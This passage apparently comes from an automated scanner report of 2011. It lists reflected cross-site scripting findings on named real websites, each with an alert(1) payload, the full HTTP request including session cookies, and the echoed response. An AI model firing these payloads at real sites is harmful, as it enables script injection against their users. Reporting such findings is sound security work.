cb95731872f
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /visitor/addons/deploy2.asp?site=54909046d539f%0acb95731872f&d_id=ndb-sales&default=simpleDeploy HTTP/1.1
Host: sr2.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/directbanking/?linkid=WWW_Z_NDB_A6A58_SP30_C1_01_T_SP1SP1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 14079
Cache-Control: public, max-age=3600
Date: Fri, 22 Jul 2011 20:32:10 GMT
Connection: close

//Plugins for site 54909046d539f
cb95731872f

lpAddMonitorTag();
if(typeof lpMTagConfig!="undefined")lpMTagConfig.getLPVarValue=function(c){if(!lpMTagConfig.varLookup){lpMTagConfig.varLookup={};for(var b=0;b<lpMTagConfig.vars.length;b++){var a=
...[SNIP]...

3.91. http://syn.5min.com/handlers/SenseHandler.ashx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://syn.5min.com
Path:   /handlers/SenseHandler.ashx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ae349<script>alert(1)</script>d4acfa4c84b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /handlers/SenseHandler.ashx?func=GetResults&thumbSeedCounter=0&sid=768&categories=6%2C5%2C8%2C4%2C13%2C2%2C14&fallback=0&fallbackType=featured&textLocation=1&thumbnailSize=0&width=468&height=200&NumOfColumnsAsked=3&NumOfRowsAsked=1&url=http%3A%2F%2Fwww.lifescript.com%2FHealth%2FConditions%2FADD%2FHow_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx%3Futm_source%3Doutbrain%26utm_medium%3Dcpc%26utm_campaign%3DADHD_Adult&isnewts=true&callback=FIVEMIN.RequestManager.callbacks[71787]&ae349<script>alert(1)</script>d4acfa4c84b=1 HTTP/1.1
Host: syn.5min.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Server: fmv-m06 - syn
Date: Thu, 21 Jul 2011 19:24:43 GMT
Content-Length: 50062

FIVEMIN.RequestManager.callbacks[71787]({"binding":[{"ID":338597705,"Title":"Helping Adults with ADHD Become More Organized","WrapTitle":"Helping Adults with ADHD Become More Organized","ThumbURL":"ht
...[SNIP]...
52fHow_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx%253futm_source%253doutbrain%2526utm_medium%253dcpc%2526utm_campaign%253dADHD_Adult&isnewts=true&callback=FIVEMIN.RequestManager.callbacks%255b71787%255d&ae349<script>alert(1)</script>d4acfa4c84b=1&endUrl=1&logvCQ=4&logmId=110165741&logvGeo=0&logvExp=2147483647&logsKey=1&logvf=0&endUrlLog=1","IsFlagged":false,"mId":110165741,"vCat":260,"vCQ":4,"vExp":2147483647,"vGeo":0,"vf":0,"vFlg":0},{"ID":
...[SNIP]...

3.92. http://widgets.klout.com/ [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.klout.com
Path:   /

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99f63"><script>alert(1)</script>22ad580a563 was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?from=ks99f63"><script>alert(1)</script>22ad580a563 HTTP/1.1
Host: widgets.klout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: useBeta=1; forcedBeta=1; arrival_cookie=98b56134fc99bed15f2fd5a80818ad795283fd8c129697d9e64225945a634518a599f407fbb43ecf4a658b9ddf1a7db104c0d63b0746cfa03aaae1ab863abc117bdbb02d3db71de68697ce8ebe3b140cc694f4b6b9ac4bf3e11f81dffb4fbe1533cd73f68e028d22f98ab3055e53149c2adff152894de28de8dcf45425320dd945ad7c826560b357796ca6dc6d533ba78ba27924bdfc3a27ae4551253c31a845794d816ada889934d5f388625fc9e08a450fa5909e6636d6f9b6142468d27d5d3cc846223b4e70019c67a324da173d7e2040d7a91ae12b06d845ee0ecfc1a68b; __qca=P0-2053982506-1311432752930; __unam=c3eadea-131577bf952-48e618ce-1; __utma=261428178.226286795.1311432753.1311432753.1311432753.1; __utmb=261428178.5.10.1311432753; __utmc=261428178; __utmz=261428178.1311432753.1.1.utmcsr=klout.com|utmccn=(referral)|utmcmd=referral|utmcct=/home

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 14:53:07 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.5
Vary: Accept-Encoding
Content-Length: 17995
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Bringing Influen
...[SNIP]...
<a href="http://klout.com/auth/login?prev_page=http://widgets.klout.com/?from=ks99f63"><script>alert(1)</script>22ad580a563">
...[SNIP]...

3.93. http://widgets.klout.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.klout.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7db0"><script>alert(1)</script>00158fd2c7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?from=ks&a7db0"><script>alert(1)</script>00158fd2c7d=1 HTTP/1.1
Host: widgets.klout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: useBeta=1; forcedBeta=1; arrival_cookie=98b56134fc99bed15f2fd5a80818ad795283fd8c129697d9e64225945a634518a599f407fbb43ecf4a658b9ddf1a7db104c0d63b0746cfa03aaae1ab863abc117bdbb02d3db71de68697ce8ebe3b140cc694f4b6b9ac4bf3e11f81dffb4fbe1533cd73f68e028d22f98ab3055e53149c2adff152894de28de8dcf45425320dd945ad7c826560b357796ca6dc6d533ba78ba27924bdfc3a27ae4551253c31a845794d816ada889934d5f388625fc9e08a450fa5909e6636d6f9b6142468d27d5d3cc846223b4e70019c67a324da173d7e2040d7a91ae12b06d845ee0ecfc1a68b; __qca=P0-2053982506-1311432752930; __unam=c3eadea-131577bf952-48e618ce-1; __utma=261428178.226286795.1311432753.1311432753.1311432753.1; __utmb=261428178.5.10.1311432753; __utmc=261428178; __utmz=261428178.1311432753.1.1.utmcsr=klout.com|utmccn=(referral)|utmcmd=referral|utmcct=/home

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 14:53:07 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.5
Vary: Accept-Encoding
Content-Length: 18001
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Bringing Influen
...[SNIP]...
<a href="http://klout.com/auth/login?prev_page=http://widgets.klout.com/?from=ks&a7db0"><script>alert(1)</script>00158fd2c7d=1">
...[SNIP]...

3.94. http://www.apple.com/global/scripts/search_featured.php [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.apple.com
Path:   /global/scripts/search_featured.php

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 13c5d<a>52f5b9de88c was submitted in the q parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /global/scripts/search_featured.php?q=xss13c5d<a>52f5b9de88c&section=global&geo=us HTTP/1.1
Host: www.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/search/?q=xss
X-Prototype-Version: 1.7
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_orientation=%5B%5BB%5D%5D; s_ria=Flash%2010%7C; s_pathLength=homepage%3D1%2C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3Bch%3Dhomepage%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3B; s_ppv=apple%2520-%2520index%2Ftab%2520%2528us%2529%2C73%2C73%2C723%2C; s_orientationHeight=723; dfa_cookie=appleglobal%2Capplehome; s_pv=apple%20-%20index%2Ftab%20(us); s_cc=true; s_sq=%5B%5BB%5D%5D; ccl=YPG5TuFKot1LUn+lq23wrLdlvLPUZJXpPAP21q2AZI6ybOrmCQ9ZvagVaKElnHhuLxZWILPlyU10pXqhEcXHaZA8muizMYxVUyHDxAP/1nqg7Or3wEZaQGRv2xbBSUJmA90kWKiGNAW6Uf7jiyrAIqTtFgtOeWA2YYfTbJKKJt52YHNnKf5HURbWq1GKAWWdJwNuJX/jqQEzK8RJ4TumuXXzJMQryFbRo53bGT4o5YXTEstHYlEdhotv+GFiYid8W80i+u1p++O5ZSdYF3iEuzrN9myAmXbFZrGgn5TxcGU8v9leUS7EKDYqNxvqeypQHhHbO2dc9DqxVa1LGZTPv6wiFB5gKx83rZDijFgpC4S249Tgf+zDP3cBbWAEmvi2KDdVVFonUlUfpWpd1AK3CVm/Oi98XAN+OlMwHC/CdDLWB7VyDpfX5gJd+ZmnJ1I0sLGBXu3Ns7cDz4Rj66ko8ELCLhslcfJMEh45qUnY1+KFoUzgtF1EO6KPe5w2KQbxekoRSFW6zhoc9CCfqgPX9EQI85tjSAyuM2cQWDApn7n21P5svZBUoF4SrBI9fy6L; geo=US

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Unix)
ntCoent-Length: 91
Content-Type: text/xml
Content-Length: 91
Vary: Accept-Encoding
Cache-Control: max-age=579
Expires: Thu, 21 Jul 2011 20:57:03 GMT
Date: Thu, 21 Jul 2011 20:47:24 GMT
Connection: close

<shortcuts><term>xss13c5d<a>52f5b9de88c</term><search_results></search_results></shortcuts>

3.95. http://www.lijit.com/delivery/fp [n parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /delivery/fp

Issue detail

The value of the n request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37c7d"%3balert(1)//5cbd0c080c3 was submitted in the n parameter. This input was echoed as 37c7d";alert(1)//5cbd0c080c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /delivery/fp?u=curse&z=125814&n=137c7d"%3balert(1)//5cbd0c080c3 HTTP/1.1
Host: www.lijit.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://c627028.r28.cf2.rackcdn.com/v36defaultsusa728x90btf.html
Cookie: ljt_reader=8ca95226d166ed67e0a44dc3d93140ea; ljtrtb=eJyrVjJUslIyMTQxMzUxMTI0MDSwMDYzNDI1U6oFAE8JBbs%3D

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 04:49:31 GMT
Server: PWS/1.7.3.3
X-Px: ms iad-agg-n28 ( iad-agg-n5), ms iad-agg-n5 ( origin>CONN)
Cache-Control: max-age=7200
Expires: Sat, 23 Jul 2011 06:49:31 GMT
Age: 0
Content-Length: 15044
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive

function LjtAds_ReportError(errorMsg, except){
   try{
       errorMsg = "[Ads JS] "+ errorMsg
       try{
           errorMsg += " - "+ except.message
       } catch(e){}
       errorMsg = encodeURIComponent(errorMsg);
       
       var s
...[SNIP]...
get Time String', e);
       return "00:00:00";
   }
}

try{
   // Settings: Change these values on a per user basis
   var lwp_ad_username = "curse";
   var lwp_ad_zoneid = ljt_getZoneID();
   var lwp_ad_numads = "137c7d";alert(1)//5cbd0c080c3";
   var lwp_ad_premium = "1";// or 0 for non-premium ad
   var lwp_ad_eleid = "lijit_region_125814";
   var lwp_method = "regex";
   var lwp_referring_search = getReferringSearch(document.referrer);
   
   var l
...[SNIP]...

3.96. http://www.myyearbook.com/advertising/default.php [n parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myyearbook.com
Path:   /advertising/default.php

Issue detail

The value of the n request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3248a</script><script>alert(1)</script>30706a77c6b was submitted in the n parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertising/default.php?n=TribalFusion3248a</script><script>alert(1)</script>30706a77c6b&section=None&size=728x90&site=MYB&sub=Network HTTP/1.1
Host: www.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; scorecardresearch=89164312-271382480-1311271170773; MYB_TARGET=_unknown_1000_____; __gads=ID=e4ff36fbd53734c2:T=1311271225:S=ALNI_MYXbcCfMT7-Mayo-AiWicg3ClEByg

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:00:41 GMT
Server: Apache
X-Server-Name: web10
Content-Length: 888
Connection: close
Content-Type: text/html; charset=UTF-8
X-MyPoolMember: 10.100.10.245

<style>body{ padding:0px;margin:0px; }</style>
<html>
<head>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
<script type="text/javascri
...[SNIP]...
<script type="text/javascript">
GA_googleAddSlot("ca-pub-8250125438595222", "Default_TribalFusion3248a</script><script>alert(1)</script>30706a77c6b_MYB_728x90_None_Network");
</script>
...[SNIP]...

3.97. http://www.myyearbook.com/advertising/default.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myyearbook.com
Path:   /advertising/default.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f145c</script><script>alert(1)</script>43acc39f631 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertising/default.php?n=TribalFusion&section=None&size=728x90&site=MYB&sub=Net/f145c</script><script>alert(1)</script>43acc39f631work HTTP/1.1
Host: www.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; scorecardresearch=89164312-271382480-1311271170773; MYB_TARGET=_unknown_1000_____; __gads=ID=e4ff36fbd53734c2:T=1311271225:S=ALNI_MYXbcCfMT7-Mayo-AiWicg3ClEByg

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:00:43 GMT
Server: Apache
X-Server-Name: web54
Content-Length: 890
Connection: close
Content-Type: text/html; charset=UTF-8
X-MyPoolMember: 10.100.10.121

<style>body{ padding:0px;margin:0px; }</style>
<html>
<head>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
<script type="text/javascri
...[SNIP]...
<script type="text/javascript">
GA_googleAddSlot("ca-pub-8250125438595222", "Default_TribalFusion_MYB_728x90_None_Net/f145c</script><script>alert(1)</script>43acc39f631work");
</script>
...[SNIP]...

3.98. http://www.myyearbook.com/advertising/default.php [section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myyearbook.com
Path:   /advertising/default.php

Issue detail

The value of the section request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84675</script><script>alert(1)</script>7ee31c862b0 was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertising/default.php?n=TribalFusion&section=None84675</script><script>alert(1)</script>7ee31c862b0&size=728x90&site=MYB&sub=Network HTTP/1.1
Host: www.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; scorecardresearch=89164312-271382480-1311271170773; MYB_TARGET=_unknown_1000_____; __gads=ID=e4ff36fbd53734c2:T=1311271225:S=ALNI_MYXbcCfMT7-Mayo-AiWicg3ClEByg

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:00:41 GMT
Server: Apache
X-Server-Name: web16-new
Content-Length: 938
Connection: close
Content-Type: text/html; charset=UTF-8
X-MyPoolMember: 10.100.10.4

<style>body{ padding:0px;margin:0px; }</style>
<html>
<head>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
<script type="text/javascri
...[SNIP]...
<script type="text/javascript">
GA_googleAddSlot("ca-pub-8250125438595222", "Default_TribalFusion_MYB_728x90_None84675</script><script>alert(1)</script>7ee31c862b0_Network");
</script>
...[SNIP]...

3.99. http://www.myyearbook.com/advertising/default.php [section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myyearbook.com
Path:   /advertising/default.php

Issue detail

The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d66ee</script><script>alert(1)</script>0f8920e32d5 was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertising/default.php?n=TribalFusion&section=Noned66ee</script><script>alert(1)</script>0f8920e32d5&size=728x90&site=MYB&sub=Network HTTP/1.1
Host: www.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; scorecardresearch=89164312-271382480-1311271170773; MYB_TARGET=_unknown_1000_____; __gads=ID=e4ff36fbd53734c2:T=1311271225:S=ALNI_MYXbcCfMT7-Mayo-AiWicg3ClEByg

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:00:41 GMT
Server: Apache
X-Server-Name: web25
Content-Length: 938
Connection: close
Content-Type: text/html; charset=UTF-8
X-MyPoolMember: 10.100.10.74

<style>body{ padding:0px;margin:0px; }</style>
<html>
<head>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
<script type="text/javascri
...[SNIP]...
<script type="text/javascript">
GA_googleAddAttr('Section','Noned66ee</script><script>alert(1)</script>0f8920e32d5');
</script>
...[SNIP]...

3.100. http://www.myyearbook.com/advertising/default.php [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myyearbook.com
Path:   /advertising/default.php

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d38c9</script><script>alert(1)</script>c625e2bc1cf was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertising/default.php?n=TribalFusion&section=None&size=728x90&site=MYBd38c9</script><script>alert(1)</script>c625e2bc1cf&sub=Network HTTP/1.1
Host: www.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; scorecardresearch=89164312-271382480-1311271170773; MYB_TARGET=_unknown_1000_____; __gads=ID=e4ff36fbd53734c2:T=1311271225:S=ALNI_MYXbcCfMT7-Mayo-AiWicg3ClEByg

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:00:42 GMT
Server: Apache
X-Server-Name: web63
Content-Length: 888
Connection: close
Content-Type: text/html; charset=UTF-8
X-MyPoolMember: 10.100.10.213

<style>body{ padding:0px;margin:0px; }</style>
<html>
<head>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
<script type="text/javascri
...[SNIP]...
<script type="text/javascript">
GA_googleAddSlot("ca-pub-8250125438595222", "Default_TribalFusion_MYBd38c9</script><script>alert(1)</script>c625e2bc1cf_728x90_None_Network");
</script>
...[SNIP]...

3.101. http://www.myyearbook.com/advertising/default.php [size parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myyearbook.com
Path:   /advertising/default.php

Issue detail

The value of the size request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 301ff</script><script>alert(1)</script>e2929316508 was submitted in the size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertising/default.php?n=TribalFusion&section=None&size=728x90301ff</script><script>alert(1)</script>e2929316508&site=MYB&sub=Network HTTP/1.1
Host: www.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
